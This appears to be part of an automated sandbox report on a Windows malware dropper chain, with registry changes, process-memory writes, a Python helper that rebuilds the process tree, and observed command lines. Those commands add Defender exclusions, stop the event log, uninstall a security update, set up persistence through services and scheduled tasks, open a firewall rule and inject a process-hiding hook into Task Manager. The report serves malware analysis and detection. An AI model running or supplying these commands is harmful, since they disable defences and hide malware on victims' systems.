Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A N/A N/A (plus 61 further rows with no description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 1116 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3512 wrote to memory of 1116 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 924 N/A N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 924 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 4028 N/A N/A C:\Users\Admin\AppData\Local\Temp\FACE.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 3512 wrote to memory of 2020 N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 5104 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 5104 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 3228 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3512 wrote to memory of 4816 N/A N/A C:\Users\Admin\AppData\Local\Temp\70AE.exe
PID 3208 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
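
The WriteProcessMemory table above is the closest thing this report has to a process tree: each "PID A wrote to memory of B" row is one write into a freshly created child, and the sandbox emits one row per write, which is why most edges appear three times. The script below is an added example, not part of the original report, that parses a constructed subset of those rows, collapses the repeated writes into a single parent/child edge, and renders the chain as an indented tree so the dropper fan-out (EC25.exe, regsvr32.exe loading F231.dll, 723.exe's Inno Setup stub spawning mmediabuilder.exe, 375C.exe unpacking InstallSetup4.exe, BroomSetup.exe, cmd.exe, chcp.com and schtasks.exe) is readable at a glance. PID 3512 has no image in the table (its Process column is N/A), so the root is printed as N/A rather than guessed.

```python
import re
from collections import Counter, OrderedDict

# Rows copied from the "Suspicious use of WriteProcessMemory" table above. This is a
# constructed subset (not the full table) and deliberately keeps the three identical
# rows for PID 2248 to show how repeated write events collapse into one edge.
SAMPLE_ROWS = r"""
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 2248 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC25.exe
PID 3512 wrote to memory of 1116 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1116 wrote to memory of 4856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3512 wrote to memory of 2868 N/A N/A C:\Users\Admin\AppData\Local\Temp\723.exe
PID 2868 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\723.exe C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp
PID 3588 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3588 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe
PID 3512 wrote to memory of 5104 N/A N/A C:\Users\Admin\AppData\Local\Temp\375C.exe
PID 5104 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\375C.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 3228 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 4432 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3208 wrote to memory of 4452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3208 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
"""

# Columns: Description ("PID <src> wrote to memory of <dst>"), Indicator (N/A in every row
# here), Process (source image or N/A) and Target (destination image). Every image starts
# with a drive letter, so the lazy group stops at the first " X:\" that opens the Target
# column; a Target path containing a space ("Media Builder") is simply consumed to the end.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) ([A-Za-z]:\\.*)$")


def parse_rows(text):
    """Return (edges, writes): edges maps (parent_pid, child_pid) -> (parent_image, child_image)
    in first-seen order; writes counts how many rows the sandbox emitted for each edge."""
    edges, writes = OrderedDict(), Counter()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank line or a row in another shape
        parent, child, parent_image, child_image = m.groups()
        key = (int(parent), int(child))
        edges.setdefault(key, (parent_image, child_image))
        writes[key] += 1
    return edges, writes


def build_tree(edges):
    """Turn the edge list into roots, a children map and a pid -> image map."""
    children, images = {}, {}
    for (p, c), (pimg, cimg) in edges.items():
        children.setdefault(p, []).append(c)
        images[c] = cimg
        if pimg != "N/A":
            images.setdefault(p, pimg)
    parents = {c for _, c in edges}
    roots = list(dict.fromkeys(p for p, _ in edges if p not in parents))
    return roots, children, images


def render_tree(roots, children, images):
    """Indented text tree, two spaces per level; unknown images print as N/A."""
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {images.get(pid, 'N/A')}")
        for c in children.get(pid, []):
            walk(c, depth + 1)

    for r in roots:
        walk(r, 0)
    return lines


if __name__ == "__main__":
    edges, writes = parse_rows(SAMPLE_ROWS)
    print("\n".join(render_tree(*build_tree(edges))))
    print("writes per edge:", dict(writes))
```

Run against the full table the same way; the only rows the regex will skip are ones whose Target is not a drive-letter path, which does not occur in this report.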

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

C:\Users\Admin\AppData\Local\Temp\EC25.exe

C:\Users\Admin\AppData\Local\Temp\EC25.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F231.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F231.dll

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\F84C.exe

C:\Users\Admin\AppData\Local\Temp\FACE.exe

C:\Users\Admin\AppData\Local\Temp\FACE.exe

C:\Users\Admin\AppData\Local\Temp\723.exe

C:\Users\Admin\AppData\Local\Temp\723.exe

C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp" /SL5="$D002C,2424585,54272,C:\Users\Admin\AppData\Local\Temp\723.exe"

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

"C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe" -i

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

"C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe" -s

C:\Users\Admin\AppData\Local\Temp\375C.exe

C:\Users\Admin\AppData\Local\Temp\375C.exe

C:\Users\Admin\AppData\Local\Temp\4901.exe

C:\Users\Admin\AppData\Local\Temp\4901.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\70AE.exe

C:\Users\Admin\AppData\Local\Temp\70AE.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2084 -ip 2084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1956

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
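
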